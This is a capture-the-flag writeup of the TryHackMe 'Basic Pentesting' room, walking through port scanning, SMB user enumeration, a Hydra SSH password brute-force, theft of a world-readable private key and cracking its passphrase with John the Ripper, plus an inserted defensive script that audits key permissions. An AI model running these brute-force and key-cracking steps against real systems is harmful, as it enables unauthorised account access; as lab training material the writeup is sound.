
Basic Pentesting writeup [thm]

basic pentesting

This is a machine that allows you to practise web app hacking and privilege escalation

Basic Pentesting. I'd completely forgotten about writing this. Since I had this writeup collecting binary dust on my hard drive why not publish it with some slight improvements? I didn't re-do the challenge to verify that everything checks out though.

This writeup contains some minor spoilers (usernames).


Task 1 Web App Testing and Privilege Escalation

In this set of tasks you'll learn the following:

  • brute forcing
  • hash cracking
  • service enumeration
  • Linux Enumeration

The main goal here is to learn as much as possible.

Deploy the machine and connect to our network

Just run

$: sudo openvpn [REDACTED].ovpn

in a terminal.

Find the services exposed by the machine

$: nmap $target

Yields:

Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-08 23:07 CET
Nmap scan report for $target
Host is up (0.075s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 1.35 seconds

Inspecting the web server gives us the following information:

<html>

<h1>Undergoing maintenance</h1>

<h4>Please check back later</h4>

<!-- Check our dev note section if you need to know what to work on. -->


</html>

What is the name of the hidden directory on the web server?

Now run dirbuster, I used the GUI with the wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt.

This will get us /development/

Visiting http://$target/development we find two files:

dev.txt:

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm 
using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

and j.txt:

For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.

-K

From this we get some useful information. We know that there are at least two users on the system, 'k' and 'j', and the latter is known to have a weak password.

What is the username?

In the nmap output we saw that there were open SMB ports.

By running

$: enum4linux -a $target

we get lots of information on the samba setup ending with:

...
S-1-5-21-2853212168-2008227510-3551253869-1037 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-1038 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-1039 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-1040 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-1041 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-1042 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-1043 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-1044 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-1045 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-1046 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-1047 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-1048 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-1049 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)

So we found the user names 'kay' and 'jan'!

What is the password?

Since we know, from the notes, that jan has a weak password we can try to crack it by attacking the SSH server with Hydra.

$: hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://$target
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-08 23:30:19
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://$target:22/

[STATUS] 178.00 tries/min, 178 tries in 00:01h, 14344223 to do in 1343:06h, 16 active
[STATUS] 127.33 tries/min, 382 tries in 00:03h, 14344019 to do in 1877:30h, 16 active
[22][ssh] host: $target   login: jan   password: [REDACTED]
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-08 23:36:55

The password of jan is [REDACTED].

What service do you use to access the server?

We can now access the server via SSH using this password.

ssh jan@$target

Looking around, at first we find nothing interesting. We go to the home directory of kay. Here we find a file pass.bak, but permission is denied; we can't read it. Looking in /home/kay/.ssh, however, we find a readable private RSA key. Note to self: make sure that SSH keys always have proper permissions.
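As an added defender's check (not part of the original writeup), the following Python audits a directory tree for private SSH keys that are readable by other users or stored without a passphrase, the two conditions that made kay's key usable here. The two key files it writes in demo() are constructed samples, not real keys.

```python
import base64
import tempfile
from pathlib import Path

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def is_encrypted(data: bytes) -> bool:
    """True if passphrase-protected: PEM 'Proc-Type: 4,ENCRYPTED' header, or OpenSSH cipher != none."""
    if b"Proc-Type: 4,ENCRYPTED" in data:
        return True
    if b"BEGIN OPENSSH PRIVATE KEY" in data:
        body = b"".join(line for line in data.splitlines() if not line.startswith(b"-----"))
        try:
            raw = base64.b64decode(body)
        except ValueError:
            return False  # malformed body: not a usable key either way
        if raw.startswith(OPENSSH_MAGIC):  # 15-byte magic, then a length-prefixed cipher name
            clen = int.from_bytes(raw[15:19], "big")
            return raw[19:19 + clen] != b"none"
    return False


def audit_keys(root: str) -> list[dict]:
    """Walk `root`; report each private key's mode, exposure and passphrase status."""
    findings = []
    for path in filter(Path.is_file, Path(root).rglob("*")):
        try:
            data, mode = path.read_bytes(), path.stat().st_mode & 0o777
        except OSError:
            continue  # skip files we cannot read
        if b"-----BEGIN" in data and b"PRIVATE KEY-----" in data:
            findings.append({"path": str(path), "mode": oct(mode),
                             "readable_by_others": bool(mode & 0o077),  # group/other bits
                             "encrypted": is_encrypted(data)})
    return findings


def demo() -> list[dict]:
    """Audit two constructed samples (not real keys): a world-readable unprotected
    OpenSSH-format key, like kay's, and a passphrase-protected PEM key with mode 0600."""
    root = Path(tempfile.mkdtemp())
    raw = OPENSSH_MAGIC + (4).to_bytes(4, "big") + b"none" + b"\x00" * 8
    (root / "id_rsa").write_bytes(b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
                                  + base64.b64encode(raw) + b"\n-----END OPENSSH PRIVATE KEY-----\n")
    (root / "id_rsa").chmod(0o644)
    (root / "id_rsa_good").write_bytes(b"-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                                       b"DEK-Info: AES-128-CBC,00\n\nAAAA\n-----END RSA PRIVATE KEY-----\n")
    (root / "id_rsa_good").chmod(0o600)
    return sorted(audit_keys(str(root)), key=lambda f: f["path"])
```

Run audit_keys("/home") as root to get the same report for every user's key on a box.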

There is also a note in authorized_keys along the lines of

I don't have to type long passwords anymore

We steal id_rsa and copy it to our workstation. The first thing we try is of course to log in directly using this key, in the hope that the key has no password protection.

$: ssh -i id_rsa kay@$target

But we have no such luck.

However, the note indicated that the key has a short-ish password so maybe we can crack it?

First, we must convert it to a John The Ripper friendly format.

$: /usr/share/john/ssh2john.py key > hash

Then we run John with the classic rockyou wordlist.

$: john hash -wordlist=/usr/share/wordlists/rockyou.txt 
Created directory: /home/[REDACTED]/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDACTED]          (key)
1g 0:00:00:09 DONE (2021-03-09 00:02) 0.1003g/s 1438Kp/s 1438Kc/s 1438KC/s *7¡Vamos!
Session completed

The password is '[REDACTED]'!

We can now login:

$: ssh -i id_rsa kay@$target
$: cat pass.bak 
[REDACTED]

And we are done, room completed!

Conclusion

I found this writeup lying around collecting dust in my wiki. Completely forgotten. I was initially surprised at how decent this writeup was, but that's just because I mostly copied stuff from this video walkthrough.

Actually that video was how I found out about TryHackMe and Basic Pentesting was the very first challenge I "solved". I thought it would be fun to publish a writeup of my very first CTF.

At the time, I was clueless and had absolutely no idea what I was doing. I knew most of the tools but my experience of using them prior to this was limited, to say the least. Maybe with the exception of Nmap.

Despite just following the video walkthrough, I distinctly remember it being a very good feeling when I got in.

This challenge would probably be slightly too easy for me now, which means that I've progressed.

I'm glad I found out about Gobuster.

Tools used

  • Nmap
  • Dirbuster
  • Firefox
  • Enum4linux
  • Hydra
  • ssh2john.py
  • John the Ripper
  • SSH